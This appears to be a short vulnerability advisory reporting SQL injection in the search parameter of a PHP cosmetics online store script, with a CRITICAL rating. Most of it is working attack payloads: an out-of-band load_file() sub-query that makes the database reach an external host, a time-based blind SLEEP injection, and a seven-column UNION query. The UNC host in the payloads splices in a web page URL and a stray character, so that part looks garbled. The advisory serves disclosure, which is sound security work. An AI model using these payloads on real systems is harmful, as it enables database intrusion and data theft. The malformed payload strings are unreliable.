Cosmetics-and-Beauty-Product-Online-Store-SQL-Injection
Vendor
Description:
The search parameter on Cosmetics-and-Beauty-Product-Online-Store v1.0 appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.html\\vcu'))+' was submitted in the search parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous!
Status: CRITICAL
[+] Payloads:
---
Parameter: search (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\vcu'))+'') AND (SELECT 8319 FROM (SELECT(SLEEP(3)))tZAp) AND ('YVjM'='YVjM
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: p=products&search=k98fv1dx2487vpqrspg6nz8jvaogfx6pz6pv'+(select load_file('\\\\u0vw93wpos6gspupnz9fqeiy6pci0io9rxik98y.https://www.sourcecodester.com/php/15181/cosmetics-and-beauty-product-online-store-phpoop-free-source-code.htmls\\vcu'))+'') UNION ALL SELECT 47,47,47,CONCAT(0x717a6b7171,0x5371436d48496454644b78506c746c637876537176426748654f4644545544616b50674e41505442,0x7170787671),47,47,47,47,47,47-- -
---
